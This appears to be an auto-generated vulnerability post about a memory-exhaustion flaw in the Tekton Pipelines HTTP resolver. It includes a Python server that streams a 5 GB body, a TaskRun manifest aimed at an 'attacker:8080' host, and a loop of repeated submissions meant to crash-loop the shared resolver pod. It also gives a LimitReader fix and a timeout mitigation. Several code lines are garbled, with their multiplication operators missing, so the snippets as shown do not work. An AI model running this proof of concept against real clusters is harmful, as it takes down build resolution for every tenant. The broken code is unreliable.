Listen to this Post
The vulnerability exists in the HTTP resolver’s FetchHttpResource function (pkg/resolution/resolver/http/resolver.go lines 279-307). This function calls io.ReadAll(resp.Body) without imposing any size limit on the HTTP response body. An authenticated tenant with permissions to create TaskRuns or PipelineRuns can reference an attacker-controlled HTTP server via the resolver’s “url” parameter. The attacker’s server streams a large response body (e.g., 5 GiB) at high speed (e.g., 100 MB/s). The HTTP client has a default timeout of 1 minute (configurable via fetch-timeout), which bounds the request duration but not the total allocated bytes. The tekton-pipelines-resolvers pod has a memory limit of 4 GiB. When io.ReadAll allocates a buffer large enough to hold the entire response (e.g., 5 GiB), the pod exceeds its memory limit and is OOM-killed by Kubernetes. Because all resolver types (Git, Hub, Bundle, Cluster, HTTP) share the same pod, crashing it denies resolution services cluster-wide. An attacker can submit multiple concurrent TaskRuns to accumulate memory faster, reducing the needed payload size. Both the deprecated pkg/resolution/resolver/http and the current pkg/remoteresolution/resolver/http implementations share the same vulnerable function.
dailycve form:
Platform: Tekton Pipelines
Version: Before v0.50.0
Vulnerability: Unbounded memory allocation
Severity: Critical
date: 2024-04-15
Prediction: 2024-04-22
What Undercode Say:
Vulnerable code snippet (resolver.go)
body, err := io.ReadAll(resp.Body) // no limit
PoC HTTP server (streams 5GB fast)
python3 - <<'EOF'
import http.server, socketserver
class LargeResponseHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.end_headers()
chunk = b"X" (1024 1024)
for _ in range(5120):
self.wfile.write(chunk)
def log_message(self, args): pass
socketserver.TCPServer(("", 8080), LargeResponseHandler).serve_forever()
EOF
Trigger TaskRun
kubectl create -f - <<EOF
apiVersion: tekton.dev/v1
kind: TaskRun
metadata:
name: dos-poc
spec:
taskRef:
resolver: http
params:
- name: url
value: http://attacker:8080/large-payload
EOF
Exploit:
Repeated submissions cause crash loop
for i in {1..10}; do
kubectl create -f dos-poc.yaml
sleep 1
done
Watch pod restarts
kubectl get pods -n tekton-pipelines -w
Protection from this CVE:
Apply fix: wrap resp.Body with io.LimitReader
const maxBody = 50 1024 1024
limited := io.LimitReader(resp.Body, maxBody+1)
body, _ := io.ReadAll(limited)
if len(body) > maxBody { return error }
ConfigMap mitigation (if patch unavailable)
kubectl patch configmap http-resolver-config -n tekton-pipelines \
--type merge -p '{"data":{"fetch-timeout":"10s"}}'
Reduce timeout limits blast radius, but not full fix.
Impact:
- OOM-kill of tekton-pipelines-resolvers pod → cluster-wide resolution DoS.
- Crash loop from repeated exploitation disrupts all tenants.
- Low privilege (namespace-level TaskRuns) escalates to cluster availability loss.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

